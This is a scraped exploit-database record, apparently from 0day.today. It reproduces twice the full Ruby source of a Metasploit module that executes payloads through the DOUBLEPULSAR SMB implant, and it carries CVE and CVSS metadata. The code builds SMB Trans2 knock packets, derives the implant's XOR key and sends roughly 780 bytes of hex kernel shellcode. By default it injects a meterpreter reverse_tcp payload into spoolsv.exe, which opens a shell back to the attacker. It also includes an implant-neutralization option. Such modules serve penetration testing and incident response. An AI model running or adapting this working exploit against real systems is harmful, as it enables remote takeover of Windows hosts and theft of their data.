'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-05] #"}, "lastseen": "2021-09-04T22:15:17", "differentElements": ["sourceData"], "edition": 7}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "3ace9e5c190b891c9c0bdd28badf178d", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-09-05T22:11:21", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:154690", "PACKETSTORM:142602", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27803", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:42030", "EDB-ID:42031"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96709", "SMNTC-96703", "SMNTC-96705"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-05T22:11:21", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-05T22:11:21", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n 